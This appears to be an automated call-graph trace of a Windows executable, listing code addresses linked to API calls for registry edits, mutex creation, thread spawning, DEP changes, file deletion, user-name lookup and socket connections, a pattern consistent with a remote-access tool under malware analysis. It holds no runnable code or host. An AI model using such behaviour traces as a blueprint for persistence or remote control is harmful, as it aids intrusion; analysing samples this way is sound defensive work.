___scrt_fastfail 46778->47382 46784 401e45 22 API calls 46779->46784 46780 40e185 47380 4068d4 97 API calls 46780->47380 46781 40e89c 47258 412d0b RegOpenKeyExW 46781->47258 46788 40e1d7 46784->46788 46785->46761 46789 40e1af 46785->46789 46793 401e45 22 API calls 46788->46793 47381 4068d4 97 API calls 46789->47381 46791 401ee9 11 API calls 46792 40e8b9 46791->46792 46795 401ee9 11 API calls 46792->46795 46794 40e1f2 46793->46794 46799 401e45 22 API calls 46794->46799 46796 40e8c2 46795->46796 47261 40d246 46796->47261 46801 40e20c 46799->46801 46803 401e45 22 API calls 46801->46803 46802 40e8cc 46804 40e226 46803->46804 46805 401e45 22 API calls 46804->46805 46807 40e23f 46805->46807 46806 40e2ac 46809 40e2bb 46806->46809 46814 40e437 ___scrt_fastfail 46806->46814 46807->46806 46808 401e45 22 API calls 46807->46808 46813 40e254 _wcslen 46808->46813 46810 40e2c4 46809->46810 46838 40e340 ___scrt_fastfail 46809->46838 46811 401e45 22 API calls 46810->46811 46812 40e2cd 46811->46812 46815 401e45 22 API calls 46812->46815 46813->46806 46816 401e45 22 API calls 46813->46816 47443 4129e0 RegOpenKeyExA 46814->47443 46817 40e2df 46815->46817 46818 40e26f 46816->46818 46820 401e45 22 API calls 46817->46820 46822 401e45 22 API calls 46818->46822 46821 40e2f1 46820->46821 46825 401e45 22 API calls 46821->46825 46823 40e284 46822->46823 47383 40cf38 46823->47383 46824 40e482 46826 401e45 22 API calls 46824->46826 46827 40e31a 46825->46827 46828 40e4a7 46826->46828 46833 401e45 22 API calls 46827->46833 47152 402073 46828->47152 46831 401ef3 28 API calls 46832 40e2a3 46831->46832 46835 401ee9 11 API calls 46832->46835 46836 40e32b 46833->46836 46835->46806 47441 40c307 45 API calls _wcslen 46836->47441 46837 40e4b9 47158 412a57 RegCreateKeyA 46837->47158 47142 412c2f 46838->47142 46843 40e3d4 ctype 46847 401e45 22 API calls 46843->46847 46844 40e33b 46844->46838 46845 401e45 22 API calls 46846 40e4db 46845->46846 47164 43a3ac 46846->47164 46848 40e3eb 46847->46848 46848->46824 46852 40e3ff 46848->46852 46851 40e4f2 47446 41b6a6 86 API calls ___scrt_fastfail 46851->47446 46854 401e45 22 API calls 46852->46854 46853 40e515 46857 402073 28 API calls 46853->46857 46855 40e408 46854->46855 46858 41a7b9 28 API calls 46855->46858 46860 40e52a 46857->46860 46861 40e414 46858->46861 46859 40e4f9 CreateThread 46859->46853 46862 402073 28 API calls 46860->46862 47442 40e991 88 API calls 46861->47442 46864 40e539 46862->46864 47168 41a04a 46864->47168 46865 40e419 46865->46824 46867 40e420 46865->46867 46867->46752 46869 401e45 22 API calls 46870 40e54a 46869->46870 46871 401e45 22 API calls 46870->46871 46872 40e55c 46871->46872 46873 401e45 22 API calls 46872->46873 46874 40e572 46873->46874 46875 401e45 22 API calls 46874->46875 46876 40e592 46875->46876 46877 43a3ac _strftime 39 API calls 46876->46877 46878 40e59f 46877->46878 46879 401e45 22 API calls 46878->46879 46880 40e5aa 46879->46880 46881 401e45 22 API calls 46880->46881 46882 40e5bb 46881->46882 47192 40949a 46882->47192 46885 401e45 22 API calls 46886 40e5d9 46885->46886 46887 40e5e5 46886->46887 46888 40e61e 46886->46888 47447 432df5 46887->47447 46891 401e45 22 API calls 46888->46891 46892 40e62e 46891->46892 46895 40e676 46892->46895 46896 40e63a 46892->46896 46893 401e45 22 API calls 46894 40e601 46893->46894 46897 40e608 CreateThread 46894->46897 46899 401e45 22 API calls 46895->46899 46898 432df5 new 22 API calls 46896->46898 46897->46888 46900 40e643 46898->46900 46901 40e67f 46899->46901 46902 401e45 22 API calls 46900->46902 46904 40e6e9 46901->46904 46905 40e68b 46901->46905 46903 40e655 46902->46903 46907 40e65c CreateThread 46903->46907 46908 401e45 22 API calls 46904->46908 46906 401e45 22 API calls 46905->46906 46909 40e69b 46906->46909 46907->46895 46911 40e6f2 46908->46911 46912 401e45 22 API calls 46909->46912 46910 40e737 47227 41a168 46910->47227 46911->46910 46914 401e45 22 API calls 46911->46914 46915 40e6b0 46912->46915 46917 40e707 46914->46917 47454 40ceec 31 API calls 46915->47454 46922 401e45 22 API calls 46917->46922 46925 40e71c 46922->46925 46923 40e6c3 46926 401ef3 28 API calls 46923->46926 46935 43a3ac _strftime 39 API calls 46925->46935 46929 40e6cf 46926->46929 46927 40e760 CreateThread 46930 40e781 46927->46930 46931 40e775 CreateThread 46927->46931 48072 40ecea 46927->48072 46928 40e75d SetProcessDEPPolicy 46928->46927 46932 401ee9 11 API calls 46929->46932 46933 40e796 46930->46933 46934 40e78a CreateThread 46930->46934 46931->46930 46936 40e6d8 CreateThread 46932->46936 46938 40e7e9 46933->46938 46940 402073 28 API calls 46933->46940 46934->46933 46937 40e729 46935->46937 46936->46904 47455 40b6dc 6 API calls 46937->47455 47251 4127e7 RegOpenKeyExA 46938->47251 46941 40e7b9 46940->46941 47456 4052dd 28 API calls 46941->47456 46947 40e80a 46949 41a7b9 28 API calls 46947->46949 46950 40e81a 46949->46950 47457 412903 31 API calls 46950->47457 46955 40e830 46956 401ee9 11 API calls 46955->46956 46959 40e83b 46956->46959 46957 40e863 DeleteFileW 46958 40e86a 46957->46958 46957->46959 46958->46772 46959->46772 46959->46957 46960 40e851 Sleep 46959->46960 46960->46959 46961->46636 46962->46643 46963->46653 46964->46654 46965->46656 46966->46659 46967->46663 46968->46665 46973 44e3e8 46969->46973 46972 43782a 8 API calls 3 library calls 46972->46666 46975 44e401 46973->46975 46977 44e405 46973->46977 46991 4338bb 46975->46991 46976 432ec8 46976->46669 46976->46972 46977->46975 46979 448526 46977->46979 46980 448532 ___scrt_is_nonwritable_in_current_image 46979->46980 46998 444189 EnterCriticalSection 46980->46998 46982 448539 46999 44ea03 46982->46999 46984 448548 46985 448557 46984->46985 47010 4483ba 23 API calls 46984->47010 47012 448573 LeaveCriticalSection std::_Lockit::~_Lockit 46985->47012 46988 448552 47011 448470 GetStdHandle GetFileType 46988->47011 46989 448568 ___scrt_is_nonwritable_in_current_image 46989->46977 46992 4338c6 IsProcessorFeaturePresent 46991->46992 46993 4338c4 46991->46993 46995 433908 46992->46995 46993->46976 47033 4338cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46995->47033 46997 4339eb 46997->46976 46998->46982 47000 44ea0f ___scrt_is_nonwritable_in_current_image 46999->47000 47001 44ea33 47000->47001 47002 44ea1c 47000->47002 47013 444189 EnterCriticalSection 47001->47013 47021 43eead 20 API calls __dosmaperr 47002->47021 47005 44ea6b 47022 44ea92 LeaveCriticalSection std::_Lockit::~_Lockit 47005->47022 47006 44ea21 pre_c_initialization ___scrt_is_nonwritable_in_current_image 47006->46984 47007 44ea3f 47007->47005 47014 44e954 47007->47014 47010->46988 47011->46985 47012->46989 47013->47007 47023 4443f4 47014->47023 47016 44e973 47018 445002 _free 20 API calls 47016->47018 47017 44e966 47017->47016 47030 447304 11 API calls 2 library calls 47017->47030 47020 44e9c5 47018->47020 47020->47007 47021->47006 47022->47006 47028 444401 __Getctype 47023->47028 47024 444441 47032 43eead 20 API calls __dosmaperr 47024->47032 47025 44442c RtlAllocateHeap 47026 44443f 47025->47026 47025->47028 47026->47017 47028->47024 47028->47025 47031 441850 7 API calls 2 library calls 47028->47031 47030->47017 47031->47028 47032->47026 47033->46997 47035 433432 GetStartupInfoW 47034->47035 47035->46682 47037 44d8eb 47036->47037 47038 44d8e2 47036->47038 47037->46686 47041 44d7d8 48 API calls 5 library calls 47038->47041 47040->46686 47041->47037 47043 41b508 LoadLibraryA GetProcAddress 47042->47043 47044 41b4f8 GetModuleHandleA GetProcAddress 47042->47044 47045 41b536 GetModuleHandleA GetProcAddress 47043->47045 47046 41b526 GetModuleHandleA GetProcAddress 47043->47046 47044->47043 47047 41b562 28 API calls 47045->47047 47048 41b54e GetModuleHandleA GetProcAddress 47045->47048 47046->47045 47047->46690 47048->47047 47460 41a003 FindResourceA 47049->47460 47052 43a620 ___std_exception_copy 21 API calls 47053 40e90a _Yarn 47052->47053 47054 402097 28 API calls 47053->47054 47055 40e925 47054->47055 47056 401fc2 28 API calls 47055->47056 47057 40e930 47056->47057 47058 401fb8 11 API calls 47057->47058 47059 40e939 47058->47059 47060 43a620 ___std_exception_copy 21 API calls 47059->47060 47061 40e94a _Yarn 47060->47061 47463 40644c 47061->47463 47063 40e97d 47063->46692 47065 4020bf 11 API calls 47064->47065 47084 41a989 47065->47084 47066 401fb8 11 API calls 47067 41aa2b 47066->47067 47069 401fb8 11 API calls 47067->47069 47068 41a9fb 47072 404182 28 API calls 47068->47072 47071 41aa33 47069->47071 47074 401fb8 11 API calls 47071->47074 47073 41aa07 47072->47073 47075 401fc2 28 API calls 47073->47075 47077 40df28 47074->47077 47078 41aa10 47075->47078 47076 401fc2 28 API calls 47076->47084 47086 40f05a 47077->47086 47079 401fb8 11 API calls 47078->47079 47081 41aa18 47079->47081 47080 401fb8 11 API calls 47080->47084 47082 41b73f 28 API calls 47081->47082 47085 41a9f9 47082->47085 47084->47068 47084->47076 47084->47080 47084->47085 47466 404182 47084->47466 47469 41b73f 47084->47469 47085->47066 47087 40f066 47086->47087 47089 40f06d 47086->47089 47511 402143 11 API calls 47087->47511 47089->46700 47091 401e4d 47090->47091 47092 401e55 47091->47092 47512 402138 22 API calls 47091->47512 47092->46707 47096 4020bf 11 API calls 47095->47096 47097 40530a 47096->47097 47513 403280 47097->47513 47099 405326 47099->46715 47517 4051cf 47100->47517 47102 408840 47521 402035 47102->47521 47105 401fc2 47106 401fd1 47105->47106 47113 402019 47105->47113 47107 4023ae 11 API calls 47106->47107 47108 401fda 47107->47108 47109 40201c 47108->47109 47111 401ff5 47108->47111 47110 40265a 11 API calls 47109->47110 47110->47113 47553 403078 28 API calls 47111->47553 47113->46724 47115 401fb2 47114->47115 47116 401fa9 47114->47116 47115->46733 47554 4025c0 28 API calls 47116->47554 47555 401f8b 47118->47555 47120 40c581 CreateMutexA GetLastError 47120->46751 47556 41ab12 47121->47556 47126 401fc2 28 API calls 47127 419e5a 47126->47127 47128 401fb8 11 API calls 47127->47128 47129 419e62 47128->47129 47130 41288e 31 API calls 47129->47130 47131 419eb8 47129->47131 47132 419e8b 47130->47132 47131->46759 47133 419e96 StrToIntA 47132->47133 47134 419ead 47133->47134 47135 419ea4 47133->47135 47136 401fb8 11 API calls 47134->47136 47564 41b874 22 API calls 47135->47564 47136->47131 47139 406d9e 47138->47139 47140 412831 3 API calls 47139->47140 47141 406da5 47140->47141 47141->46770 47141->46771 47143 412c4d 47142->47143 47144 40644c 28 API calls 47143->47144 47145 412c62 47144->47145 47146 4020d6 28 API calls 47145->47146 47147 412c72 47146->47147 47148 412a57 14 API calls 47147->47148 47149 412c7c 47148->47149 47150 401fb8 11 API calls 47149->47150 47151 412c89 47150->47151 47151->46843 47153 40207b 47152->47153 47154 4023ae 11 API calls 47153->47154 47155 402086 47154->47155 47565 4024cd 47155->47565 47159 412aa7 47158->47159 47160 412a70 47158->47160 47161 401fb8 11 API calls 47159->47161 47163 412a82 RegSetValueExA RegCloseKey 47160->47163 47162 40e4cf 47161->47162 47162->46845 47163->47159 47165 43a3c5 _strftime 47164->47165 47569 439703 47165->47569 47167 40e4e8 47167->46851 47167->46853 47169 41a060 GetLocalTime 47168->47169 47170 41a0fb 47168->47170 47171 4052fe 28 API calls 47169->47171 47172 401fb8 11 API calls 47170->47172 47173 41a0a2 47171->47173 47174 41a103 47172->47174 47175 408832 28 API calls 47173->47175 47176 401fb8 11 API calls 47174->47176 47177 41a0ae 47175->47177 47178 40e53e 47176->47178 47597 402ef0 47177->47597 47178->46869 47181 408832 28 API calls 47182 41a0c6 47181->47182 47602 406874 76 API calls 47182->47602 47184 41a0d4 47185 401fb8 11 API calls 47184->47185 47186 41a0e0 47185->47186 47187 401fb8 11 API calls 47186->47187 47188 41a0e9 47187->47188 47189 401fb8 11 API calls 47188->47189 47190 41a0f2 47189->47190 47191 401fb8 11 API calls 47190->47191 47191->47170 47606 401f66 47192->47606 47194 4094b1 _wcslen 47195 4094c4 47194->47195 47196 4094db 47194->47196 47197 40cf38 31 API calls 47195->47197 47198 40cf38 31 API calls 47196->47198 47199 4094cc 47197->47199 47200 4094e3 47198->47200 47201 401ef3 28 API calls 47199->47201 47202 401ef3 28 API calls 47200->47202 47204 4094d6 47201->47204 47203 4094f1 47202->47203 47205 401ee9 11 API calls 47203->47205 47207 401ee9 11 API calls 47204->47207 47206 4094f9 47205->47206 47621 4087f0 28 API calls 47206->47621 47209 409530 47207->47209 47211 409576 47209->47211 47212 409557 47209->47212 47210 40950b 47622 402ff4 47210->47622 47214 4086d0 28 API calls 47211->47214 47215 409574 47212->47215 47610 4086d0 47212->47610 47217 409584 47214->47217 47218 401ee9 11 API calls 47215->47218 47627 40977e 85 API calls 47217->47627 47222 409596 47218->47222 47220 401ef3 28 API calls 47225 409520 47220->47225 47222->46885 47226 401ee9 11 API calls 47225->47226 47226->47204 47228 41a18b GetUserNameW 47227->47228 47690 40415e 47228->47690 47233 402ff4 28 API calls 47234 41a1cd 47233->47234 47235 401ee9 11 API calls 47234->47235 47236 41a1d6 47235->47236 47237 401ee9 11 API calls 47236->47237 47238 40e740 47237->47238 47239 401ef3 47238->47239 47240 401f02 47239->47240 47247 401f4a 47239->47247 47241 402232 11 API calls 47240->47241 47242 401f0b 47241->47242 47243 401f4d 47242->47243 47245 401f26 47242->47245 47244 402316 11 API calls 47243->47244 47244->47247 47784 40303c 28 API calls 47245->47784 47248 401ee9 47247->47248 47249 402232 11 API calls 47248->47249 47250 401ef2 47249->47250 47250->46927 47250->46928 47252 412808 RegQueryValueExA RegCloseKey 47251->47252 47253 40e801 47251->47253 47252->47253 47253->46796 47253->46947 47255 41a7cd 47254->47255 47785 40ae7e 47255->47785 47257 41a7d5 47257->46781 47259 40e8af 47258->47259 47260 412d27 RegDeleteValueW 47258->47260 47259->46791 47260->47259 47262 40d25f 47261->47262 47263 4127e7 3 API calls 47262->47263 47264 40d266 47263->47264 47265 40d285 47264->47265 47799 4016e7 47264->47799 47269 414271 47265->47269 47267 40d273 47802 412b5f RegCreateKeyA 47267->47802 47270 4020bf 11 API calls 47269->47270 47271 414285 47270->47271 47816 41a40e 47271->47816 47274 4020bf 11 API calls 47275 41429b 47274->47275 47276 401e45 22 API calls 47275->47276 47277 4142a9 47276->47277 47278 43a3ac _strftime 39 API calls 47277->47278 47279 4142b6 47278->47279 47280 4142c8 47279->47280 47281 4142bb Sleep 47279->47281 47282 402073 28 API calls 47280->47282 47281->47280 47283 4142d7 47282->47283 47284 401e45 22 API calls 47283->47284 47285 4142e0 47284->47285 47286 4020d6 28 API calls 47285->47286 47287 4142eb 47286->47287 47288 41a976 28 API calls 47287->47288 47289 4142f3 47288->47289 47820 40487e WSAStartup 47289->47820 47291 4142fd 47292 401e45 22 API calls 47291->47292 47293 414306 47292->47293 47294 401e45 22 API calls 47293->47294 47318 414385 47293->47318 47295 41431f 47294->47295 47298 401e45 22 API calls 47295->47298 47296 401e45 22 API calls 47296->47318 47297 4020d6 28 API calls 47297->47318 47299 414330 47298->47299 47301 401e45 22 API calls 47299->47301 47300 41a976 28 API calls 47300->47318 47302 414341 47301->47302 47303 401e45 22 API calls 47302->47303 47305 414352 47303->47305 47304 406292 28 API calls 47304->47318 47307 401e45 22 API calls 47305->47307 47306 401fc2 28 API calls 47306->47318 47308 414363 47307->47308 47309 401e45 22 API calls 47308->47309 47310 414375 47309->47310 47980 40471d 88 API calls 47310->47980 47313 4144d3 WSAGetLastError 47981 41b45a 47313->47981 47318->47296 47318->47297 47318->47300 47318->47304 47318->47306 47318->47313 47320 41a04a 79 API calls 47318->47320 47322 4052fe 28 API calls 47318->47322 47323 401e6d 11 API calls 47318->47323 47325 414d41 47318->47325 47327 408832 28 API calls 47318->47327 47329 402ef0 28 API calls 47318->47329 47330 402073 28 API calls 47318->47330 47331 401fb8 11 API calls 47318->47331 47334 4086d0 28 API calls 47318->47334 47336 4129e0 3 API calls 47318->47336 47337 41288e 31 API calls 47318->47337 47338 40415e 28 API calls 47318->47338 47343 401e45 22 API calls 47318->47343 47821 414230 47318->47821 47827 40480d 47318->47827 47834 404f31 47318->47834 47849 4048a8 connect 47318->47849 47909 41a33b 47318->47909 47912 413904 47318->47912 47915 440751 47318->47915 47919 40d28d 47318->47919 47925 41a79d 47318->47925 47928 41a879 47318->47928 47932 41a6e9 47318->47932 47966 404e06 WaitForSingleObject 47318->47966 47992 4052dd 28 API calls 47318->47992 47320->47318 47322->47318 47323->47318 47324 401e45 22 API calls 47324->47325 47325->47318 47325->47324 47326 43a3ac _strftime 39 API calls 47325->47326 47362 402073 28 API calls 47325->47362 47363 41a04a 79 API calls 47325->47363 47364 401fb8 11 API calls 47325->47364 47365 401ee9 11 API calls 47325->47365 47994 40a5c4 84 API calls 47325->47994 47328 414e01 Sleep 47326->47328 47327->47318 47328->47318 47329->47318 47330->47318 47331->47318 47334->47318 47336->47318 47337->47318 47338->47318 47344 414780 GetTickCount 47343->47344 47345 41a6e9 28 API calls 47344->47345 47349 41479d 47345->47349 47347 41a6e9 28 API calls 47347->47349 47349->47347 47351 41a879 28 API calls 47349->47351 47353 402e81 28 API calls 47349->47353 47354 408832 28 API calls 47349->47354 47356 402ef0 28 API calls 47349->47356 47358 401fb8 11 API calls 47349->47358 47359 401ee9 11 API calls 47349->47359 47937 41a641 47349->47937 47939 41a5f1 47349->47939 47944 40ee14 29 API calls 47349->47944 47945 402f11 28 API calls 47349->47945 47946 408853 28 API calls 47349->47946 47947 404bf0 47349->47947 47993 404a81 60 API calls _Yarn 47349->47993 47351->47349 47353->47349 47354->47349 47356->47349 47358->47349 47359->47349 47362->47325 47363->47325 47364->47325 47365->47325 47366->46708 47367->46716 47368->46719 47371 4020bf 11 API calls 47370->47371 47372 40629e 47371->47372 47373 403280 28 API calls 47372->47373 47374 4062bb 47373->47374 47374->46741 47376 40e0a8 47375->47376 47377 41285b RegQueryValueExA RegCloseKey 47375->47377 47376->46738 47376->46760 47377->47376 47378->46744 47379->46780 47380->46771 47381->46761 47382->46779 47384 401f66 11 API calls 47383->47384 47385 40cf54 47384->47385 47386 40cf74 47385->47386 47387 40cfa9 47385->47387 47389 40cf6a 47385->47389 48063 41a10f 29 API calls 47386->48063 47388 41ab12 GetCurrentProcess 47387->47388 47392 40cfae 47388->47392 47391 40d09d GetLongPathNameW 47389->47391 47394 40415e 28 API calls 47391->47394 47395 40cfb2 47392->47395 47396 40d004 47392->47396 47393 40cf7d 47397 401ef3 28 API calls 47393->47397 47398 40d0b2 47394->47398 47401 40415e 28 API calls 47395->47401 47400 40415e 28 API calls 47396->47400 47402 40cf87 47397->47402 47399 40415e 28 API calls 47398->47399 47403 40d0c1 47399->47403 47404 40d012 47400->47404 47405 40cfc0 47401->47405 47407 401ee9 11 API calls 47402->47407 48066 40d2d5 28 API calls 47403->48066 47410 40415e 28 API calls 47404->47410 47411 40415e 28 API calls 47405->47411 47407->47389 47408 40d0d4 48067 402f85 28 API calls 47408->48067 47413 40d028 47410->47413 47414 40cfd6 47411->47414 47412 40d0df 48068 402f85 28 API calls 47412->48068 48065 402f85 28 API calls 47413->48065 48064 402f85 28 API calls 47414->48064 47418 40d0e9 47421 401ee9 11 API calls 47418->47421 47419 40d033 47422 401ef3 28 API calls 47419->47422 47420 40cfe1 47423 401ef3 28 API calls 47420->47423 47424 40d0f3 47421->47424 47425 40d03e 47422->47425 47426 40cfec 47423->47426 47427 401ee9 11 API calls 47424->47427 47428 401ee9 11 API calls 47425->47428 47429 401ee9 11 API calls 47426->47429 47430 40d0fc 47427->47430 47431 40d047 47428->47431 47432 40cff5 47429->47432 47433 401ee9 11 API calls 47430->47433 47434 401ee9 11 API calls 47431->47434 47435 401ee9 11 API calls 47432->47435 47436 40d105 47433->47436 47434->47402 47435->47402 47437 401ee9 11 API calls 47436->47437 47438 40d10e 47437->47438 47439 401ee9 11 API calls 47438->47439 47440 40d117 47439->47440 47440->46831 47441->46844 47442->46865 47444 412a06 RegQueryValueExA RegCloseKey 47443->47444 47445 412a2a 47443->47445 47444->47445 47445->46824 47446->46859 47449 432dfa 47447->47449 47448 43a620 ___std_exception_copy 21 API calls 47448->47449 47449->47448 47450 40e5ee 47449->47450 48069 441850 7 API calls 2 library calls 47449->48069 48070 433530 RaiseException __CxxThrowException@8 new 47449->48070 48071 433513 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47449->48071 47450->46893 47454->46923 47455->46910 47457->46955 47458->46766 47461 41a020 LoadResource LockResource SizeofResource 47460->47461 47462 40e8fb 47460->47462 47461->47462 47462->47052 47464 402097 28 API calls 47463->47464 47465 406460 47464->47465 47465->47063 47480 40421a 47466->47480 47470 41b74c 47469->47470 47471 41b7ab 47470->47471 47476 41b75c 47470->47476 47472 41b7c5 47471->47472 47473 41b8eb 28 API calls 47471->47473 47495 41ba51 28 API calls 47472->47495 47473->47472 47475 41b794 47494 41ba51 28 API calls 47475->47494 47476->47475 47486 41b8eb 47476->47486 47477 41b7a7 47477->47084 47481 404223 47480->47481 47482 4023ae 11 API calls 47481->47482 47483 40422e 47482->47483 47484 402549 28 API calls 47483->47484 47485 404195 47484->47485 47485->47084 47488 41b8f3 47486->47488 47487 41b925 47487->47475 47488->47487 47489 41b929 47488->47489 47492 41b90d 47488->47492 47506 402705 22 API calls std::_Xinvalid_argument 47489->47506 47496 41b95c 47492->47496 47494->47477 47495->47477 47497 41b966 __EH_prolog 47496->47497 47507 4026f7 22 API calls 47497->47507 47499 41b979 47508 41ba68 11 API calls 47499->47508 47501 41b99f 47502 41b9d7 47501->47502 47509 402710 11 API calls 47501->47509 47502->47487 47504 41b9be 47510 4026f2 11 API calls std::_Deallocate 47504->47510 47507->47499 47508->47501 47509->47504 47510->47502 47511->47089 47515 40328a 47513->47515 47514 4032a9 47514->47099 47515->47514 47516 4028c8 28 API calls 47515->47516 47516->47514 47518 4051db 47517->47518 47527 405254 47518->47527 47520 4051e8 47520->47102 47522 402041 47521->47522 47523 4023ae 11 API calls 47522->47523 47524 40205b 47523->47524 47549 40265a 47524->47549 47528 405262 47527->47528 47529 405268 47528->47529 47530 40527e 47528->47530 47538 4025d0 47529->47538 47531 4052d5 47530->47531 47532 405296 47530->47532 47547 402884 22 API calls std::_Xinvalid_argument 47531->47547 47536 4028c8 28 API calls 47532->47536 47537 40527c 47532->47537 47536->47537 47537->47520 47539 402868 22 API calls 47538->47539 47540 4025e2 47539->47540 47541 402652 47540->47541 47542 402609 47540->47542 47548 402884 22 API calls std::_Xinvalid_argument 47541->47548 47545 4028c8 28 API calls 47542->47545 47546 40261b 47542->47546 47545->47546 47546->47537 47550 40266b 47549->47550 47551 4023ae 11 API calls 47550->47551 47552 40206d 47551->47552 47552->47105 47553->47113 47554->47115 47557 41ab1f GetCurrentProcess 47556->47557 47558 419e2c 47556->47558 47557->47558 47559 41288e RegOpenKeyExA 47558->47559 47560 4128bc RegQueryValueExA RegCloseKey 47559->47560 47561 4128e6 47559->47561 47560->47561 47562 402073 28 API calls 47561->47562 47563 4128fb 47562->47563 47563->47126 47564->47134 47566 4024d9 47565->47566 47567 4024ea 28 API calls 47566->47567 47568 402091 47567->47568 47568->46837 47585 43a30a 47569->47585 47571 439750 47591 4390b7 35 API calls 3 library calls 47571->47591 47573 439715 47573->47571 47574 43972a 47573->47574 47576 43972f pre_c_initialization 47573->47576 47590 43eead 20 API calls __dosmaperr 47574->47590 47576->47167 47578 43975c 47580 43978b 47578->47580 47592 43a34f 39 API calls __Tolower 47578->47592 47579 4397f7 47594 43a2b6 20 API calls 2 library calls 47579->47594 47580->47579 47593 43a2b6 20 API calls 2 library calls 47580->47593 47583 4398be _strftime 47583->47576 47595 43eead 20 API calls __dosmaperr 47583->47595 47586 43a322 47585->47586 47587 43a30f 47585->47587 47586->47573 47596 43eead 20 API calls __dosmaperr 47587->47596 47589 43a314 pre_c_initialization 47589->47573 47590->47576 47591->47578 47592->47578 47593->47579 47594->47583 47595->47576 47596->47589 47603 401f90 47597->47603 47599 402efe 47600 402035 11 API calls 47599->47600 47601 402f0d 47600->47601 47601->47181 47602->47184 47604 4025d0 28 API calls 47603->47604 47605 401f9d 47604->47605 47605->47599 47607 401f6e 47606->47607 47628 402232 47607->47628 47609 401f79 47609->47194 47611 4086e6 47610->47611 47612 402232 11 API calls 47611->47612 47613 408700 47612->47613 47633 404247 47613->47633 47615 40870e 47616 409835 47615->47616 47658 40ae66 47616->47658 47619 401ee9 11 API calls 47620 409866 47619->47620 47620->47215 47621->47210 47663 403202 47622->47663 47624 403002 47667 403242 47624->47667 47627->47215 47629 40228c 47628->47629 47630 40223c 47628->47630 47629->47609 47630->47629 47632 402759 11 API calls std::_Deallocate 47630->47632 47632->47629 47634 402868 22 API calls 47633->47634 47635 40425b 47634->47635 47636 404270 47635->47636 47637 404285 47635->47637 47643 4042bf 22 API calls 47636->47643 47645 4027c6 47637->47645 47640 404279 47644 402c28 22 API calls 47640->47644 47642 404283 47642->47615 47643->47640 47644->47642 47646 4027cf 47645->47646 47647 402831 47646->47647 47648 4027d9 47646->47648 47657 402884 22 API calls std::_Xinvalid_argument 47647->47657 47651 4027e2 47648->47651 47653 4027f5 47648->47653 47656 402aca 28 API calls __EH_prolog 47651->47656 47654 4027f3 47653->47654 47655 402232 11 API calls 47653->47655 47654->47642 47655->47654 47656->47654 47659 409845 47658->47659 47660 40ae6f 47658->47660 47659->47619 47662 40aee6 28 API calls 47660->47662 47662->47659 47664 40320e 47663->47664 47673 4035f8 47664->47673 47666 40321b 47666->47624 47668 40324e 47667->47668 47669 402232 11 API calls 47668->47669 47670 403268 47669->47670 47686 402316 47670->47686 47674 403606 47673->47674 47675 403624 47674->47675 47676 40360c 47674->47676 47678 40363c 47675->47678 47679 40367e 47675->47679 47684 403686 28 API calls 47676->47684 47682 4027c6 28 API calls 47678->47682 47683 403622 47678->47683 47685 402884 22 API calls std::_Xinvalid_argument 47679->47685 47682->47683 47683->47666 47684->47683 47687 402327 47686->47687 47688 402232 11 API calls 47687->47688 47689 4023a7 47688->47689 47689->47220 47691 404166 47690->47691 47692 402232 11 API calls 47691->47692 47693 404171 47692->47693 47701 40419c 47693->47701 47696 4042dc 47712 404333 47696->47712 47698 4042ea 47699 403242 11 API calls 47698->47699 47700 4042f9 47699->47700 47700->47233 47702 4041a8 47701->47702 47705 4041b9 47702->47705 47704 40417c 47704->47696 47706 4041c9 47705->47706 47707 4041e6 47706->47707 47708 4041cf 47706->47708 47709 4027c6 28 API calls 47707->47709 47710 404247 28 API calls 47708->47710 47711 4041e4 47709->47711 47710->47711 47711->47704 47713 40433f 47712->47713 47716 404351 47713->47716 47715 40434d 47715->47698 47717 40435f 47716->47717 47718 404365 47717->47718 47719 40437e 47717->47719 47782 4034c6 28 API calls 47718->47782 47720 402868 22 API calls 47719->47720 47721 404386 47720->47721 47723 4043f9 47721->47723 47724 40439f 47721->47724 47783 402884 22 API calls std::_Xinvalid_argument 47723->47783 47726 4027c6 28 API calls 47724->47726 47736 40437c 47724->47736 47726->47736 47736->47715 47782->47736 47784->47247 47786 40ae86 47785->47786 47787 402232 11 API calls 47786->47787 47788 40ae91 47787->47788 47791 40aea6 47788->47791 47790 40aea0 47790->47257 47792 40aee0 47791->47792 47793 40aeb2 47791->47793 47798 402884 22 API calls std::_Xinvalid_argument 47792->47798 47795 4027c6 28 API calls 47793->47795 47797 40aebc 47795->47797 47797->47790 47805 43939a 47799->47805 47803 412b77 RegSetValueExA RegCloseKey 47802->47803 47804 412ba1 47802->47804 47803->47804 47804->47265 47808 43931b 47805->47808 47807 4016ed 47807->47267 47809 43932a 47808->47809 47810 43933e 47808->47810 47814 43eead 20 API calls __dosmaperr 47809->47814 47813 43932f pre_c_initialization __alldvrm 47810->47813 47815 4471d7 11 API calls 2 library calls 47810->47815 47813->47807 47814->47813 47815->47813 47819 41a454 _Yarn ___scrt_fastfail 47816->47819 47817 402073 28 API calls 47818 414290 47817->47818 47818->47274 47819->47817 47820->47291 47822 414249 WSASetLastError 47821->47822 47823 41423f 47821->47823 47822->47318 47995 4140cd 29 API calls ___std_exception_copy 47823->47995 47825 414244 47825->47822 47828 404826 socket 47827->47828 47829 404819 47827->47829 47831 404840 CreateEventW 47828->47831 47832 404822 47828->47832 47996 40487e WSAStartup 47829->47996 47831->47318 47832->47318 47833 40481e 47833->47828 47833->47832 47835 404f45 47834->47835 47840 404fc6 47834->47840 47836 404f4e 47835->47836 47837 404fa0 CreateEventA 47835->47837 47838 404f5d GetLocalTime 47835->47838 47836->47837 47837->47840 47839 41a6e9 28 API calls 47838->47839 47841 404f71 47839->47841 47840->47318 47997 4052dd 28 API calls 47841->47997 47850 4049fb 47849->47850 47851 4048ce 47849->47851 47852 40495e 47850->47852 47853 404a01 WSAGetLastError 47850->47853 47851->47852 47856 4052fe 28 API calls 47851->47856 47872 404903 47851->47872 47852->47318 47853->47852 47854 404a11 47853->47854 47857 404912 47854->47857 47858 404a16 47854->47858 47861 4048ef 47856->47861 47863 402073 28 API calls 47857->47863 47859 41b45a 30 API calls 47858->47859 47862 404a20 47859->47862 47860 40490b 47860->47857 47867 404921 47860->47867 47864 402073 28 API calls 47861->47864 48009 4052dd 28 API calls 47862->48009 47868 404a60 47863->47868 47865 4048fe 47864->47865 47869 41a04a 79 API calls 47865->47869 47874 404930 47867->47874 47875 404967 47867->47875 47871 402073 28 API calls 47868->47871 47869->47872 47876 404a6f 47871->47876 47998 41f56b 27 API calls 47872->47998 47880 402073 28 API calls 47874->47880 48006 42034b 53 API calls 47875->48006 47877 41a04a 79 API calls 47876->47877 47877->47852 47883 40493f 47880->47883 